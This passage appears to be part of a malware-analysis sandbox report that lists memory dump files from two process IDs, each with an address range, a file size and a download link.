      • memory/3536-27-0x0000000005CF0000-0x0000000005D56000-memory.dmp

        Filesize

        408KB

        Download

      • memory/3536-25-0x0000000074A30000-0x00000000751E0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3536-24-0x00000000056C0000-0x0000000005CE8000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/4500-76-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/4500-78-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/4500-74-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download